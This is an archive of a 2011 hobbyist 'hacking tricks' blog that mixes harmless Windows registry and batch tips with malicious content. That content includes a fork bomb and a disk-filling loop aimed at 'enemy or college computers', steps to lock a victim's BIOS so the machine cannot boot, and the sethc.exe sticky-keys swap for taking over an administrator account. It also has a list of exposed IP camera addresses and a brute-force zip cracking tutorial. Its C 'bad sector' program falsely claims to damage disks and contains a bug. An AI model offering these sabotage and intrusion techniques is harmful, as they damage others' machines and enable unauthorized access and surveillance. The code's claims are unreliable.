Thursday, 15 December 2011

Remove Recycle Bin from Desktop - Registry Hack


Remove Recycle Bin from Desktop : There is no option to remove recycle bin from desktop. To remove Recycle Bin from Desktop registry editing is required.
1. Direct in Regedit :

Open :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Desktop\NameSpace\
Delete :
KEY : {645FF040-5081-101B-9F08-00AA002F954E}

Remove Recycle Bin from Desktop


Write following Code in BATCH file ,save it and Run it.

>> To Delete Recycle Bin :

REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}

>> To Recover Recycle Bin :

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}

Tuesday, 13 December 2011

Disable or Enable Folder Option


Copy following Code save it as batch file (.bat) and double click it to run it.

>> To Enable folder option :

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 0 /f

>> To Disable folder option :

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

Tell Your Computer to say whatever you want to say in Female Voice

Copy this code

Code -

CreateObject("SAPI.SpVoice").Speak"I love YOU"

Save it as Visual Basic Script(.vbs) and double click on it.

Create File With Random size...Even Gb's

Try This command in the Command Prompt

Command - fsutil file createnew filename.extension 2000


For eg. fsutil file createnew anshul.mp3 5000

This will create 5 kb file namely anshul of MP3 format.

Hack - Now you can try it on School or college Computers to fill all the space on the hard drive by replacing 5000 with 500000000 or many zeros.Make it in loop and place it in a Batch file.

Code -
:a
fsutil file createnew anshul.mp3 5000
goto a

Actually the file will be overwrite but the RAM would Overflow.

Sunday, 11 December 2011

Folder Lock and Hide it


Firstly make a folder Locker and fill it with your secret files.Then place this batch file in the same directory.
Now Edit password in the line 38 which is in bold and italic.Type here your secret password and now save this batch file then double click on it.

Code -

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure you want to Lock the folder?(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%=="Type password here" goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Unlimited CMD's to Freeze Computer

This is Batch trick to Freeze computer by starting CMD as many as RAM can support....

:a
start
goto a

Just copy this to Notepad and save it as hi.bat and double click it to run it.
I suggest you to try it on your enemy or college computers......fuck their computers by putting this in start up folder

Saturday, 10 December 2011

C program without a main function


How to write a C program without a main function?. There can be a C program without a main function. Here’s the code of the program without a main function…I was messing with the header files and i found to make compiler fool..Actually u will understand that parser was able to get it right.

Code -

#include<stdio.h>
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)

int begin()

{
   printf(" hello ");
}

The above program runs perfectly fine even without a main function. But how....whats the logic behind it? How can we have a C program working without main?

Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main. But in reality it runs with a hidden main function.

The ‘##‘ operator is called the token pasting or token merging operator. That is we can merge two or more characters with it.

NOTE: A Preprocessor is program which processess the source code before compilation.

Look at the 2nd line of program -

#define decode(s,t,u,m,p,e,d) m##s##u##t

What is the preprocessor doing here. The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut). The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens)

Now look at the third line of the program -

#define begin decode(a,n,i,m,a,t,e)

Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e). According to the macro definition in the previous line the argument must be expanded so that the 4th,1st,3rd & the 2nd characters must be merged. In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,’a’,’i’ & ‘n’.

So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler. That’s it…

The bottom line is there can never exist a C program without a main function. Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exists a hidden main function in the program. Here we are using the proprocessor directive to intelligently replace the word begin” by “main”. In simple words int begin=int main.

List of IP surveillance Cameras


List of IP surveillance cameras found on the Internet
This can be used to test surveillance software in case you don't have any cameras.

http://195.140.237.241
http://gizycko.axiscam.net
http://213.196.182.244
http://147.134.38.233
http://216.8.159.20
http://rachleff.org
http://207.111.165.30
http://72.236.138.36
http://camera.buffalotrace.com
http://212.147.17.64
http://137.44.28.240
http://cam-fiddlers.athens.edu
http://cam.thesylvaherald.com
http://85.221.118.225
http://128.205.54.65
http://75.144.144.237
http://195.196.36.242
http://webcam-2.hartford.edu
http://195.243.185.195
http://64.135.233.5
http://camera.otto-stoeckl.com
http://128.173.201.214
http://77.79.225.200
http://146.186.123.229
http://62.28.103.70
http://198.189.55.240
http://mehamn.axiscam.net
http://hncam1.hn.psu.edu
http://webcam.mubo.cz
http://128.196.12.28
http://161.72.22.246
http://www.boydsnest-ti.com
http://68.167.242.226
http://camera1.jupiterfoundation.org
http://128.39.135.238
http://webcam1.eldora.com
http://79.161.169.21
http://217.168.94.131
http://217.23.231.4
http://210.236.173.198
http://webcam.magic.iac.es
http://coralsandsinn.axiscam.net
http://construction.muhlenberg.edu
http://72.240.51.210
http://webkamera.overtornea.se
http://200.61.48.74
http://148.61.139.229
http://132.236.64.74
http://24.227.114.58
http://lecroqburger.dvrdns.org
http://217.96.55.11
http://146.139.72.70
http://137.150.228.45
http://216.99.115.55
http://219.118.247.59
http://61.60.112.230
http://12.111.130.35
http://195.239.51.162
http://webcam-buesum.dyndns.org
http://204.152.63.49
http://dlmainstreetwebcam.gondtc.com
http://208.33.95.101
http://drobak.mine.nu
http://aem071.amc.anl.gov
http://82.135.124.180
http://webcams.byu.edu
http://219.118.247.55
http://camserv-6.network.bit.nl
http://trafficcams.cet.unomaha.edu
http://128.187.51.10
http://camserv-7.network.bit.nl
http://kamery.darlowo.pl
http://217.193.154.122
http://217.193.154.125
http://128.226.8.114
http://193.138.213.169
http://220.254.50.144
http://shizenkan.iobb.net
http://125.163.244.223
http://cam6284208.miemasu.net
http://125.163.176.68
http://ots.bne.jp
http://125.206.34.116
http://125.206.34.118
http://125.206.34.117

Watch Live IP Cameras

Search This on Google and view Live Webcams and  IP Cameras

Google Search String - "inurl:shtml view"

Like the First Search link you get it this


Live view - YVR  - http://216.123.238.207/view/view.shtml?id=54494&imagePath=/mjpg/video.mjpg&size=1



Enjoy...::))

How to Swap Mouse Button

Batch Trick....just one Line...must work in XP and above.

Code -

@echo off
rundll32 user32,SwapMouseButton
msg * Your Mouse Button Swapped.

Copy this to notepad and save as hi.bat and double click on it.

I know Something About You


Friday, 9 December 2011

Matrix Pattern in CMD

With this Trick you can Generate Matrix Pattern .
Copy this Code and paste in notepad . Then save it as .bat file with any name.Double click to run it.


 Code -



@echo off
:top
color 2
color 3
color 4
color 5

echo %random% %random% %random% %random%Anshul katta is great %random% %random% %random% %random%%random% %random% %random% %random%
color 1
color 6
color 7
color 8
color 9
goto top

Generating Random IP Address

There are Two Files in this Trick..We can Generate IP's from this Batch Trick.

Two Files namely are - GENIPS.BAT and RUNIPS.BAT.Download these two batch Files from here - 




Place it on the desktop and UnRAR it.


Q.How to Run ??


Ans.

1.Go to CMD and Go to Desktop by changing directory....

Command - cd Desktop

2.Now type this command on CMD.This will create random 2 IP's.Read the Detailed Example to Manipulate it more.


Command - GenIps 2 192 192 168 168 1 1 100 50









Script to list Drives and Types

First copy this code to notepad then save as name(any name).bat...for eg. "hello.bat"....and then double click it to run it.

@echo off
 setlocal

::
REM Get and list drive types using fsutil
::
set "list="

for /f "tokens=*" %%a in ('^
fsutil fsinfo drives^|^
find /V ""'

) do (

set "dv=%%a"
call set "list=%%list%% %%dv:~-3%%"
)
for %%a in (%list%) do (
fsutil fsinfo drivetype %%a
)

Make Computer Useless

Although Hacking Computer is good Job but why could not make it un-useful to Anyone....

This dirty trick will make Computer owner Cry....the only way to Repair is to install new motherboard....Here is the Trick..

1) Start victims Computer and go to BIOS Configuration

2) BIOS Setup Page can be Accessed by Pressing DEL or F2 Button when Computer Starts ( Boots). Button is different for Every Mother Board.You can find out when You Start your computer and a Post Screen Comes before Loading the Windows or Linux.

3)Now Go Boot Section and Disable " Boot by Hard Disk " and other Boot Options too. Number of Options must be coming showing
     
         HDD SATA ....  - Disable it
         CD /DVD RW Drive - Disable it
         Newtork Drive       - Disable it

4) Now Set Password for Your BOOT and BIOS by going to Security Tab . Confirm it.

5) Now Restart the Computer and the Computer will fail to Boot .

Explanation  - Computer Starts and Find BOOT Block of OS installed . Now here we have disabled the BOOT Option for Hard Disk , CD/DVD,Network . So Computer is not able to Boot from these Peripherals.
So To change this the Computer Repairer will go to BIOS to Set Hard disk as the BOOT Priority.Now He does not know the Password of BIOS . So He is not able to Install the OS and can not set Hard Disk for Boot Priority.

Although BIOS Passwords can be cracked ( like taking out the cell )but good Motherboards are good Guarded.            
 



Wednesday, 7 December 2011

Administrator Password Hack in Windows


I am quite sure you are here to search for the way to crack password. And the reason behind this must be that you are many at times resisted by your elder brother/sister/parents/Teachers to enter the computer and use it. They give you only limited access that is you cannot make changes and are restricted. You are limited and can enter in by guest account.

This is one of the best methods to Hack Windows XP or any Windows Administrator Password .For hacking admin you must have log in as guest or limited account. This method of hacking admin is very easy. You don’t need any software or live CD .All hacking is done manual. To hack XP admin password follows these steps. Please backup your files which we are going to use here.
Method

1. Go to C:/windows/system32



2. Copy cmd.exe and paste it on desktop

3. Rename cmd.exe to sethc.exe

4. Copy the new sethc.exe to system 32,when windows asks for overwriting the file, then click yes

5. Now press shift key 5 times you will get cmd prompt close that

6. Now Log out from your guest account and at the login screen, press shift key 5 times.

You will get command prompt there.


7. Now type “NET USER ADMINISTRATOR mypassword” where “mypassword” can be any password and Administrator is name of admin account, and then press enter.


You will see “The Command completed successfully” and then exit the command prompt.
That’s done, you have hacked administrator password
(NOTE: Backup your cmd.exe and sethc.exe if you are trying this on your own computer. This works because of sethc.exe process Vulnerability in Windows XP. This method of hacking XP admin password can be used where you have limited or guest access to computers. It’s all the same as parking at owners risk that is do at your own risk but it works in windows Xp and other versions including 7 and Vista too)




Hidden Files from Command prompt


View Hidden Files from Command prompt in Windows
******************
at command prompt just type
dir /ah
if the list is too long u can use
dir /ah/p/w
*******************

Password Generator

Go to this Website and Generate Password for all websites....copy them to a safe location and copy paste them during login....So Nothing to type and security Max.

http://code.hackgyan.in/passwords/index.html

Explanation

Using the same password for multiple email, shopping and social networking websites is risky, it means that a security breach at one website will compromise all your accounts, possibly even leading to identity theft.
So, the idea is that you memorise just one, reasonably long/secure master password and use that to generate a set of non-dictionary passwords. Copy and paste the new password(s) into the website and set your web browser to remember them.
All the websites get different passwords, but you only have to remember one!
Using a different PC? you can re-generate the same set of passwords at any time by returning to this page and entering the same master password.
  • For any website that's not on the list, just type the name into the 'Custom' box (the last one in the list) and press Generate.
  • Using UPPER or lower case will produce different passwords, when using this for the first time it's a good idea to use the 'Show Password' tickbox to check for any typos.
  • Most websites will send a password reset via email, so set the password for that email account to something completely different, just in case you ever forget the master password!
  • All the generated passwords end in "1a", to guarantee they contain at least one letter and one number.
This password generator works using Javascript, entirely within the page, no data is ever passed back to my server. Notwithstanding this, it is a very good idea to save your own copy of this page. Keeping your own copy ensures that the password generator will still be available to you even if this website goes off-line. You can also View-Source and see exactly how the javascript works, copy it to a USB stick, email it to yourself, even upload it to your own website (it's open source.) There are no dependent files, just save as a single HTML file.

Cracking Zip Password Files


Tut On Cracking Zip Password Files..

What is FZC?

FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.

FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.).

FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.

The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.

FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.

Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait...and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit".

We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.
If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

Now that we've gone through all the theoretical stuff, let's get to the actual commands.


--------------------------------------------------------------------------------
Bruteforce
--------------------------------------------------------------------------------


The command line you'll need to use for using brute force is:

fzc -mb -nzFile.zip -lChr Lenght -cType of chars

Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)

For Chr Lenght you can use 4 kind of switches...

-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...

For the Type of chars we have 5 switches they are:

-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers


Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:

fzc -mb -nzTest.zip -l4-7 -ca1

This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

*****
hint
*****

You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.


--------------------------------------------------------------------------------
Wordlist
--------------------------------------------------------------------------------

Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you'll do something like.

fzc -mwMode number -nzFile.zip -nwWordlist

Where:

Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.

You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC would just start reading at line 50 and would just read with length >= to 9.

Example:

If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50





--------------------------------------------------------------------------------
Resuming
--------------------------------------------------------------------------------

Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:

fzc -mr

And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.


Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program

Get And Show The IP through Java Script



var ip= '<!--#echo var="REMOTE_ADDR"-->';
document.write("Your IP Address is :"+ip+" ");
________________________________________________________________________________
__________________
To show IP via ASP


request.ServerVariables("REMOTE_ADDR")
________________________________________________________________________________
__________________
TO SHOW IP VIA PHP

<?
$remote_address = getenv("REMOTE_ADDR");
echo "Your IP address is $remote_address.";
$browser_type = getenv("HTTP_USER_AGENT");
echo "You are using $browser_type.";
?>

Art of Googling


A few things you might want to try with Google:

Hand type the following prefixes and note their utility:

link:url Shows other pages with links to that url.

related:url same as "what's related" on serps.

site:domain restricts search results to the given domain.

allinurl: shows only pages with all terms in the url.

inurl: like allinurl, but only for the next query word.

allintitle: shows only results with terms in title.

intitle: similar to allintitle, but only for the next word. "intitle:webmasterworld google" finds only pages with webmasterworld in the title, and google anywhere on the page.

cache:url will show the Google version of the passed url.

info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.

spell: will spell check your query and search for it.

stocks: will lookup the search query in a stock index.

filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.

daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.

maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.

phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for something that looks like an address (include a name and zip code)

site:www.somesite.net "+www.somesite.+net"
(tells you how many pages of your site are indexed by google)

allintext: searches only within text of pages, but not in the links or page title

allinlinks: searches only within links, not text or title


I hope there is something new in here for you and maybe this infos will be helpfull for ya.

Tuesday, 6 December 2011

Create Bad Sectors on Hard Disk

A crazy Program actually debugged by me...it was already on the internet with some error..i removed them..

Make Sure Your compiler has signal.h library.It is necessary to compile this program.



/* Debugged made by Anshul katta 9602073290
*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* I don't take responsibility for what you do with this program, served foe educational purpose only...lol.
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}

How To Customise Your start Button


First you need a tool called "Resource Hacker". This free program allows you to change resources in any .exe file such as "Explorer.exe", which includes the [Start] button's Label.
You can visit http://torrentz.eu/search?f=resource+hacker and download through Torrent.

After you download it, follow the guide here:

Step 1:

A - Run "Resource Hacker" and open the file "%windir%\Explorer.exe".
B - You see a Tree of all Resources in this file, expand the "String Table"
C - Find the "start" and replace it with your own text. then press the [Compile Script] button.
D - Save "Explorer.exe" as "MyStart.exe" DONT save it as Explorer.exe, do "save as.." and give it a new name.
E - Quit "Resource Hacker".

Step 2:

A - Click on the [Start] button and choose the "Run..." item from the start menu. (Or use the shortcut key WinKey+R)
B - Type "RegEdit" in the Run "Dialog Box". And then press the [Ok] buton to run the "Registry Editor" program.
C - Go to: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon" and find the "Shell" property.
D - Replace value of the "Shell" property to "MyStart.exe".
E - Quit "Registry Editor".
F - Restart your system.

Note about Registry Editor:
if you did not find the key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon", you can search the Registry for the "Explorer.exe", to do this use the Edit Menu | Find Next (Ctrl+F).